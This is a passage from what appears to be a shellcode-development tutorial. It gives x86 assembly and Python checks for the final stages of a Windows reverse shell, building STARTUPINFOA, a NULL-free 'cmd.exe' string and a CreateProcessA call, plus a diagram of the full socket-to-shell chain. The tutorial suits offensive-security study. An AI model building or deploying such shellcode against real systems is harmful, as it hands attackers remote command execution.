    push eax                   ; lpDesktop
    push eax                   ; lpReserved
    mov al, 44h                ; Structure size (68 bytes)
    push eax                   ; cb
    
    push esp                   ; Get pointer to structure
    pop edi                    ; Store in EDI
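The push sequence above is easier to audit against the structure's offsets. This ctypes sketch assumes the 32-bit layout, with pointers and HANDLEs modeled as 4-byte integers. It confirms the 68-byte size and where the flag and handle fields land.

```python
import ctypes

DWORD, WORD, PTR32 = ctypes.c_uint32, ctypes.c_uint16, ctypes.c_uint32


class STARTUPINFOA32(ctypes.Structure):
    _fields_ = [("cb", DWORD), ("lpReserved", PTR32), ("lpDesktop", PTR32),
                ("lpTitle", PTR32), ("dwX", DWORD), ("dwY", DWORD),
                ("dwXSize", DWORD), ("dwYSize", DWORD),
                ("dwXCountChars", DWORD), ("dwYCountChars", DWORD),
                ("dwFillAttribute", DWORD), ("dwFlags", DWORD),
                ("wShowWindow", WORD), ("cbReserved2", WORD),
                ("lpReserved2", PTR32), ("hStdInput", PTR32),
                ("hStdOutput", PTR32), ("hStdError", PTR32)]


print(hex(ctypes.sizeof(STARTUPINFOA32)))          # 0x44
print(ctypes.sizeof(STARTUPINFOA32) // 4, "pushes")  # 17 pushes
for name in ("dwFlags", "hStdInput", "hStdOutput", "hStdError"):
    print(name, hex(getattr(STARTUPINFOA32, name).offset))
```

The 17 pushes match the listing once the combined wShowWindow/cbReserved2 DWORD is counted as one push.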

Command String Creation

create_cmd_string:
    mov eax, 0ff9a879bh        ; Two's complement of 00657865h (no NULL bytes)
    neg eax                    ; EAX = 00657865h ("exe\0")
    push eax                   ; Push "exe\0"
    push 2E646D63h             ; Push "cmd."
    push esp                   ; Get pointer to "cmd.exe"
    pop ebx                    ; Store in EBX
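The NEG trick works for any DWORD whose two's complement happens to be free of NULL bytes. A small helper, sketched here as an illustration, computes the immediate to load and reports when the trick does not apply:

```python
import struct


def neg32(value):
    """Two's complement of a 32-bit value, i.e. the result of NEG."""
    return (-value) & 0xFFFFFFFF


def null_free_via_neg(value):
    """Immediate to MOV before NEG so that NEG yields `value`,
    or None if that immediate would itself contain a NULL byte."""
    imm = neg32(value)
    return None if b"\x00" in struct.pack("<I", imm) else imm


target = struct.unpack("<I", b"exe\x00")[0]   # 0x00657865
imm = null_free_via_neg(target)
print(hex(target), hex(imm))                   # 0x657865 0xff9a879b
```

When the helper returns None (for example for 0x100, whose negation is 0xFFFFFF00), a different construction is needed. The two-step ADD used for dwFlags is one such construction.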

Final CreateProcessA Call

call_createprocessa:
    mov eax, esp               ; Current stack pointer
    xor ecx, ecx               ; NULL ECX
    mov cx, 390h               ; Offset below ESP where PROCESS_INFORMATION is written
    sub eax, ecx               ; Calculate lpProcessInformation
    push eax                   ; Push lpProcessInformation
    push edi                   ; Push lpStartupInfo
    
    ; Push NULL parameters
    xor eax, eax               ; NULL EAX
    push eax                   ; lpCurrentDirectory
    push eax                   ; lpEnvironment  
    push eax                   ; dwCreationFlags
    inc eax                    ; EAX = 1 (TRUE)
    push eax                   ; bInheritHandles
    dec eax                    ; EAX = 0 (NULL)
    push eax                   ; lpThreadAttributes
    push eax                   ; lpProcessAttributes
    push ebx                   ; lpCommandLine ("cmd.exe")
    push eax                   ; lpApplicationName (NULL)
    call dword ptr [ebp+18h]   ; Call CreateProcessA

Complete Shellcode Architecture

graph TD
    A[Shellcode Entry Point] --> B[Find kernel32.dll via PEB]
    B --> C[Resolve kernel32 symbols]
    C --> D[Load ws2_32.dll]
    D --> E[Resolve ws2_32 symbols]
    E --> F[Call WSAStartup]
    F --> G[Call WSASocketA]
    G --> H[Call WSAConnect] 
    H --> I[Create STARTUPINFOA]
    I --> J[Call CreateProcessA]
    J --> K[Reverse Shell Active]
    
    subgraph "Symbol Resolution Process"
        L[Hash Function Name] --> M[Search Export Table]
        M --> N[Compare Hashes]
        N -->|Match| O[Get Function Address]
        N -->|No Match| P[Try Next Function]
        P --> M
    end

Key Implementation Notes

Memory Management

  • Always preserve non-volatile registers
  • Use stack space efficiently to avoid overwrites
  • Calculate proper offsets for structure storage

Error Handling

  • Check return values for API success
  • Handle edge cases in symbol resolution
  • Ensure graceful shellcode termination

Optimization Techniques

  • Reuse assembly instruction sequences
  • Minimize shellcode size through efficient coding
  • Use negative offsets to avoid NULL bytes

Security Considerations

  • Avoid hardcoded addresses for portability
  • Handle ASLR (Address Space Layout Randomization)
  • Ensure compatibility across Windows versions

Conclusion

This module demonstrated the complete process of creating custom Windows shellcode from scratch. Key learning outcomes include:

  1. Understanding Windows Architecture: How DLLs, APIs, and system calls interact
  2. Dynamic Symbol Resolution: Avoiding hardcoded addresses through PEB traversal and EAT parsing
  3. Position-Independent Code: Creating shellcode that works regardless of memory location
  4. NULL-Byte Avoidance: Techniques to eliminate problematic bytes from shellcode
  5. Practical Implementation: Building a functional reverse shell using Windows networking APIs

The techniques covered provide a foundation for developing reliable, portable shellcode for Windows environments. While this implementation prioritizes clarity and understanding over size optimization, the same principles apply to creating more compact shellcode variants.

Advanced Topics for Further Study:

  • Shellcode encoders and decoders
  • Anti-debugging and evasion techniques
  • 64-bit shellcode development
  • Advanced payload staging techniques